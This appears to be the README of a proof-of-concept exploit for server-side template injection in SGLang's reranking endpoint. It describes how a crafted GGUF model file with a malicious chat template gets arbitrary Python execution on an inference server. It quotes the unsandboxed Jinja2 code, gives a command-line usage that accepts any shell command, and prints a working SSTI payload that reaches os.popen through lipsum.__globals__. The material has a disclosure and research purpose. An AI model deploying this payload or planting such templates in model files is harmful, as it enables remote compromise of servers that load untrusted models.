Remote Code Execution via Server-Side Template Injection (SSTI) in SGLang's reranking endpoint. A malicious GGUF model file with a crafted tokenizer.chat_template achieves arbitrary code execution when loaded into SGLang and the /v1/rerank endpoint is called.
Taking leverage of a Critical Severity vulnerability in SGLang through unsandboxed Jinja2 template rendering. SGLang's reranking endpoint (/v1/rerank) renders model-supplied chat templates using jinja2.Environment() instead of ImmutableSandboxedEnvironment, allowing a malicious model to execute arbitrary Python code on the inference server.
This is the same vulnerability class as CVE-2024-34359 ("Llama Drama") which affected llama-cpp-python.
- Attacker crafts a GGUF model file with a malicious
tokenizer.chat_templatecontaining a Jinja2 SSTI payload - The template includes the Qwen3 reranker trigger phrase to activate the vulnerable code path in
serving_rerank.py - Victim downloads and loads the model in SGLang (e.g., from HuggingFace)
- When any request hits
/v1/rerank, SGLang reads thechat_templateand renders it withjinja2.Environment()— no sandbox - The SSTI payload executes arbitrary Python code on the server
File: python/sglang/srt/entrypoints/openai/serving_rerank.py
# serving_rerank.py lines 128-132 — UNSANDBOXED
def _get_jinja_env():
return jinja2.Environment( # <-- Should be ImmutableSandboxedEnvironment
loader=jinja2.BaseLoader(),
autoescape=False,
undefined=jinja2.Undefined,
)The PoC generates a malicious GGUF file and demonstrates code execution through SGLang's unsandboxed rendering path.
python3 exploit.py "id"
Pass any shell command as an argument — defaults to id.
The malicious chat template embedded in the GGUF file:
MALICIOUS_TEMPLATE = (
'The answer can only be "yes" or "no".\n'
'{{ lipsum.__globals__["os"].popen("echo SGLANG_RCE_CONFIRMED").read() }}'
'{% for message in messages %}{{ message["content"] }}{% endfor %}'
)- The trigger phrase (
The answer can only be "yes" or "no") is required to activate SGLang's Qwen3 reranker detection, routing the request through the vulnerable_render_jinja_chat_template()path. lipsum.__globals__["os"].popen()escapes the Jinja2 context to execute arbitrary OS commands.
- CVE-2026-5760
- CVE-2024-34359 — Same vulnerability class in llama-cpp-python
- CVE-2025-61620 — DoS in vLLM via chat templates (same attack surface)
- SGLang GitHub
- CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine
- CWE-94: Improper Control of Generation of Code
This tool is for authorized security research and educational purposes only. Use responsibly.